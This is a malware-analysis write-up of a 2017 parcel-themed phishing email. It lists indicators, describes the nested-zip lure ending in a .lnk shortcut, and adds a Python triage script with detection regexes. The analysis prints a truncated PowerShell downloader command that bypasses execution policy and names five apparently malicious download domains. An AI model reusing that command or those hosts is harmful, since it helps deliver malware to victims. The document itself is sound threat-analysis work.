Timestamps – end of January 2017 – 26/1/2017 12:06 PM
Email info
- Sender IP – 91.121.30.151
- Sender Email – [email protected]
- Subject – Parcel #8742826 shipment problem, please review
Attachment
- Hash – 45286606b6e84d39867bb89f3a769e2753248276a31d34b7623afdce481104cb
- Filename – Undelivered-Parcel-ID-874826.zip
- VirusTotal – https://www.virustotal.com/ro/file/45286606b6e84d39867bb89f3a769e2753248276a31d34b7623afdce481104cb/analysis/
Only TrendMicro relates it to something familiar, "TROJ_NEMUZIP.SMA1"; the other engines use generic names for a PowerShell downloader shortcut, such as "TR/LNK.PSH.Downloader.Gen".
Attachment comments
The attachment is nested Matryoshka style:
Undelivered-Parcel-ID-874826.zip -> Undelivered-Parcel-ID-874826.doc.zip -> Undelivered-Parcel-ID-874826.doc (folder) -> Undelivered-Parcel-ID-874826.doc.lnk = shortcut to powershell.exe
This makes sense for AV evasion (the .lnk sits two archive layers deep, and since Windows never shows the .lnk extension the file appears as a .doc), but it is an odd choice for getting the user to run the final file: it seems unlikely that a user would extract a double archive and then open a folder to execute something. More plausibly they never extract anything at all and simply keep double-clicking inside their archive viewer until the shortcut runs.
PowerShell parameters found in the shortcut (the command line as recovered is cut off after the last assignment):
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass -NoProfile -command $ld = 0; $cs = [char]92; $ll = 'jb-sounddesign.de','www.sdo.ru','vitalmanage.com','www.poolcenterdessau.de','www.gifizsee.de'; $fn = $env:temp+$cs; $lk = $fn
Domains listed
- jb-sounddesign.de
- www.sdo.ru
- vitalmanage.com
- www.poolcenterdessau.de
- www.gifizsee.de
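The nested-zip chain and the .lnk command line above can be triaged without extracting anything to disk: walk the archives in memory, parse the shell link header and string data per MS-SHLLINK, and pull the PowerShell switches and the quoted host list out of the arguments. The script below is an added example, not the author's tooling. It builds its own minimal .lnk and a Matryoshka archive with the filenames from this sample so that it runs offline; the embedded command line is a stand-in that only mirrors the shape of the real one (example.net / example.org hosts, not the domains above), and the LNK builder emits just the header, RELATIVE_PATH and COMMAND_LINE_ARGUMENTS, which is all the parser needs.

```python
"""Triage a nested-zip -> .lnk -> powershell.exe lure in memory (added example).
The sample archive and its command line are constructed here, not the real payload."""
import io
import re
import struct
import uuid
import zipfile

# LinkCLSID as stored on disk (little-endian GUID) and the LinkFlags we use.
LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046").bytes_le
HAS_RELATIVE_PATH, HAS_ARGUMENTS, IS_UNICODE = 0x08, 0x20, 0x80
STRING_DATA = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
               (0x20, "arguments"), (0x40, "icon_location"))

PS_SWITCH = re.compile(r"-(?:ExecutionPolicy\s+Bypass|NoProfile|EncodedCommand"
                       r"|WindowStyle\s+Hidden)", re.I)
QUOTED_HOST = re.compile(r"'((?:[\w-]+\.)+[a-z]{2,})'")


def build_lnk(target, args):
    """Minimal MS-SHLLINK file: 76-byte header, two unicode StringData items,
    terminal block. No ID list and no LinkInfo (those flag bits stay clear)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)   # ShowCommand=1

    def sd(s):  # CountCharacters (u16) followed by UTF-16LE characters
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + sd(target) + sd(args) + struct.pack("<I", 0)


def parse_lnk(data):
    """Return the StringData fields present in a .lnk, skipping the optional
    LinkTargetIDList and LinkInfo structures when the header says they exist."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link")
    pos = 0x4C
    if flags & 0x01:                                    # HasLinkTargetIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & 0x02:                                    # HasLinkInfo
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    out = {}
    for bit, name in STRING_DATA:
        if flags & bit:
            n = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            raw = data[pos:pos + (n * 2 if unicode else n)]
            pos += len(raw)
            out[name] = raw.decode("utf-16-le" if unicode else "cp1252")
    return out


def walk_zip(blob, path=""):
    """Yield (member path, bytes) for every file, descending into nested zips."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = f"{path}/{info.filename}" if path else info.filename
            member = zf.read(info)
            if info.filename.lower().endswith(".zip"):
                yield from walk_zip(member, name)
            else:
                yield name, member


def triage(blob):
    """Find every .lnk in the archive chain and summarise what it would launch."""
    findings = []
    for name, data in walk_zip(blob):
        if not name.lower().endswith(".lnk"):
            continue
        s = parse_lnk(data)
        target, args = s.get("relative_path", ""), s.get("arguments", "")
        findings.append({
            "path": name,
            "target": target,
            "powershell": "powershell" in (target + args).lower(),
            "switches": [m.group(0) for m in PS_SWITCH.finditer(args)],
            "hosts": QUOTED_HOST.findall(args),
        })
    return findings


# Constructed sample: same nesting and filenames as the lure, stand-in command line.
SAMPLE_ARGS = ("-ExecutionPolicy ByPass -NoProfile -command $ld = 0; "
               "$ll = 'www.example.net','example.org'; $fn = $env:temp")


def build_sample():
    lnk = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                    SAMPLE_ARGS)
    inner, outer = io.BytesIO(), io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("Undelivered-Parcel-ID-874826.doc/"
                   "Undelivered-Parcel-ID-874826.doc.lnk", lnk)
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("Undelivered-Parcel-ID-874826.doc.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for finding in triage(build_sample()):
        print(finding)
```

Pointing `triage()` at the real attachment (`triage(open(path, "rb").read())`) yields the same record for the actual shortcut: the member path shows how deep the .lnk sits, `switches` lists the policy-bypass and no-profile options, and `hosts` gives the download candidates to add to the domain list above. The parser only consumes the fields it understands, so a .lnk that also carries an ID list or LinkInfo is still handled; anything that is not a shell link raises instead of being silently skipped.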
Post Execution observations to be added